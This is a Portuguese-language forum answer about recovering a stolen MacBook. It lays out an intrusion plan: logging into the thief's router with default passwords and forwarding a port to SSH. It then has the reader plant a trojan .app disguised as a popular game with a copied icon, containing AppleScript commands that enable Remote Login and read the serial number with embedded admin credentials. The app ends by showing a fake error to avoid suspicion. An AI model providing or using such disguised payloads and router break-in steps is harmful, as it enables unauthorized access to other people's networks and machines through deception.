Eu lembro de assistir aquele vídeo do Dr. Zoz. Coisas boas.
Parece que você é competente com scripts de shell e precisa apenas de um vetor de ataque. A chave para fazer algo semelhante ao que o Zoz fez é obter acesso ao SSH. Ao contrário de sua situação, onde o ladrão estava usando um modem dial-up, é quase certo, já que os Macs mais novos não fazem discadas, que o ladrão está usando uma conexão de banda larga e está atrás de algum tipo de roteador NAT.
Mesmo se o SSH estivesse habilitado na máquina, o encaminhamento de porta teria que ser configurado no roteador para que você pudesse acessar a porta de escuta SSH da máquina do lado de fora. A vantagem de uma conexão de banda larga é que o endereço IP quase certamente mudará com menos frequência do que com discagem.
Se eu estivesse em sua posição, mantendo o IP do ladrão, tentaria primeiro fazer login na interface da Web do roteador e ver o que posso fazer a partir daí. É incrível a quantidade de pessoas que deixam suas senhas de roteador / modem padrão, e há listas on-line nas quais você pode encontrar senhas padrão para a maioria dos principais fabricantes.
Uma vez lá dentro, verifique a lista de clientes DHCP no roteador e veja se consegue encontrar o MacBook. Muitos roteadores mostrarão endereço MAC (hardware), endereço IP interno atribuído (192.168.1.x na maioria das vezes) e, mais importante, o nome da máquina.
Descobrir qual IP é atribuído ao MacBook e depois configurar uma porta para ele nas configurações do roteador. Use alguma porta externa diferente de 22, (porta 2222 por exemplo) e encaminhe-a para a porta 22 do IP do MacBook.
Muitos roteadores têm acesso SSH ativado, portanto, acessar a porta IP @ do ladrão pode levá-lo ao shell do roteador em vez do shell da máquina. Agora você deve ter uma porta no IP externo do ladrão (que você obteve do Dropbox) que o levará diretamente para a porta que o SSH deve estar ligado no MacBook. Exceto que o SSH ainda não está ativado.
Esta parte requer alguma ação do ladrão. Eu gosto da idéia de e-mail, mas é necessário que seu amigo esteja usando o Apple Mail. Uma abordagem melhor pode ser o upload de um arquivo .app tentador para o Dropbox que ativará o SSH (Login Remoto).
Você pode fazer isso através de um shell script, mas fazê-lo através do Applescript, salvando o Applescript como um .app e dando-lhe um bom ícone, tudo vai muito longe para enganar sua marca e não se doar.
Este é o código do Applescript para ativar o login remoto em:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
Esse bit de código retornará uma string com o número de série da máquina que você pode enviar por e-mail para você mesmo se quiser:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
Eu escreveria o applescript para que ele ativasse o Remote Login, faça o que você precisar. Tente não fazer o script da GUI ou de quaisquer aplicativos além do shell, pois isso levantará suspeitas. No final exibir uma mensagem para o efeito de "Este aplicativo não pode ser executado neste Macintosh." com um botão "Quit" para reduzir a suspeita. Quando o script estiver funcionando no AppleScript Editor, salve-o como um arquivo .app somente de execução.
Tente disfarçar o .app como um jogo popular, Plants vs. Zombies ou Angry Birds ou algo assim. Você pode exportar o ícone do .app do jogo real e colocá-lo no .app que você exportar do Applescript. Se o seu amigo der uma boa olhada no ladrão, você pode socializar o perfil dele e disfarçar o .app como algo em que possa estar interessado.
Desde que você possa configurar a porta para frente (sua marca não impõe práticas de segurança adequadas), e você pode fazer com que ela execute o aplicativo, você terá acesso SSH completo à máquina e poderá continuar procurando por pistas sem imediatamente revelar sua presença. Isso também exige que a marca não se canse das notificações Growl do Dropbox e saia dela, então eu aconselho seu amigo a parar de salvar os arquivos em seu Dropbox por um tempo.
Observação: se o ladrão se desconectar do ISP e se reconectar, ele receberá um novo IP externo. Adicione um arquivo ao Dropbox e aguarde que ele seja sincronizado. Isso deve te dar o IP atualizado.
Nota 2: Se o usuário não se conectar ao roteador com o MacBook por um determinado período de tempo (geralmente 24 horas), a concessão do DHCP para o endereço IP interno que foi atribuído ao MacBook expirará. O mais provável é que ele receba o mesmo endereço IP na próxima vez que se conectar, a menos que outro dispositivo seja introduzido na rede. Nesse caso, você precisará fazer login manualmente no roteador e modificar a porta para frente.
Este não é o único meio de ataque, mas é isso que eu faria no segundo que percebi que o IP ainda estava sendo atualizado via Dropbox. Boa sorte!
EDIT: Os "privilégios de administrador" no final de cada linha "do shell script" são muito importantes. O usuário será solicitado a fornecer a senha de administrador do seu amigo e o script falhará, se você não incluir o nome de usuário e a senha in-line.